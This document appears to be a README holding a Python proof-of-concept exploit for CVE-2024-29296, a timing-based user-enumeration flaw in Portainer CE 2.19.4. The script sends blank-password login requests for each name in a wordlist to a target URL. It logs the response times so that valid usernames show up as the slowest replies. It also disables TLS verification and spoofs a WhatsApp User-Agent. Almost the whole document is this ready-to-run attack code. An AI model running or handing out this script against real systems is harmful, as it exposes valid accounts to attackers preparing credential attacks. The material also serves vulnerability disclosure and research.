README.md
Rendering markdown...
'''
CVE-2024-29296
POC Author: Lavender-exe
---
Vulnerability: User enumeration
Vendor of Product: Portainer
Affected Product Code Base: Portainer CE - 2.19.4
Attack Type: Remote
Impact Information Disclosure: True
Attack Vectors: To exploit the vulnerability, someone must send several login requests for multiple usernames and check the response times. The response time for valid users is noticeably larger.
Discoverer: Thayse Marques Solis
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (5.3)
CWE-208: Observable Timing Discrepancy
'''
import requests
import urllib3
import time
import logging
from rich.logging import RichHandler
logging.basicConfig(
level="INFO",
format="%(message)s",
datefmt="[%X]",
handlers=[
RichHandler(rich_tracebacks=False),
logging.FileHandler(filename='response_time.txt', mode='w', encoding="utf-8"),
],
)
log = logging.getLogger("rich")
session = requests.Session()
urllib3.disable_warnings()
def post_request(username_file, target_url: str) -> str:
'''
Request: Sends a list of possible usernames
Response: Logs response times in response_time.txt
usernames : file
post_url : str
post_data : [dict]
post_header : [dict]
'''
with open(file=username_file, mode='r', encoding='utf-8') as usernames:
for username in usernames:
username = username.strip()
post_url = target_url
post_data = {
"username":f"{username}",
"password":""
}
post_header = {
"Content-Type":"application/json",
"User-Agent":"WhatsApp/2.2407.10 W",
}
start_time = time.perf_counter()
send_request = session.post(url=post_url, data=post_data, headers=post_header,
verify=False, allow_redirects=True)
request_time = time.perf_counter() - start_time
logging.info(f"Request for {username} completed in {request_time}")
if __name__ == "__main__":
try:
input_url = input("Enter Target URL: ")
input_username = input("Enter Username List: ")
post_request(username_file=input_username, target_url=input_url)
print("Check response_time.txt - Look for the slowest request time")
except Exception as e:
print(f"Error Caught: {e=}")